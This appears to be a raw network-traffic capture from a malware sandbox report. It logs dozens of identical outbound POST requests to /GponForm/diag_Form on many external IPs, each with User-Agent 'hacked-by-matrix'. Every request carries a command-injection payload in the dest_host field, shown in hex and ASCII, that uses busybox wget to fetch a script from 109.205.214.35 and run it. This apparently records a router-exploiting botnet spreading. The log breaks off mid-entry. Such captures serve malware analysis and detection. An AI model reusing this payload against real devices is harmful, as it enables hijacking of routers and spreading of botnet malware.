                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2126192.168.2.1357996118.94.110.188443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886282921 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2127192.168.2.13491465.228.117.230443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886305094 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2128192.168.2.1358554212.2.255.244443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886334896 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2129192.168.2.1343606118.4.83.198443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886353016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2130192.168.2.13445305.118.192.195443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886375904 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2131192.168.2.13432545.240.159.242443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886398077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2132192.168.2.1356550109.89.106.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886418104 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2133192.168.2.1352986118.53.180.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886423111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2134192.168.2.1353188212.96.115.189443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886460066 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2135192.168.2.1343024212.71.34.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886467934 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2136192.168.2.134232042.95.192.1443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886512041 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2137192.168.2.1343034212.80.174.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886537075 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2138192.168.2.1359776109.30.12.103443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886553049 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2139192.168.2.1350254118.155.212.224443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.886605024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2140192.168.2.1342026118.100.58.105443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887343884 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2141192.168.2.133623442.28.30.170443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887345076 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2142192.168.2.1360684118.165.40.189443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887367010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2143192.168.2.1350358109.50.141.177443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887367010 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2144192.168.2.13357005.246.187.141443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887382984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2145192.168.2.135508242.232.116.55443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887442112 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2146192.168.2.1352662212.106.224.99443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887459993 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2147192.168.2.13405785.163.121.224443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887468100 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2148192.168.2.13407985.183.242.73443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:46.887487888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
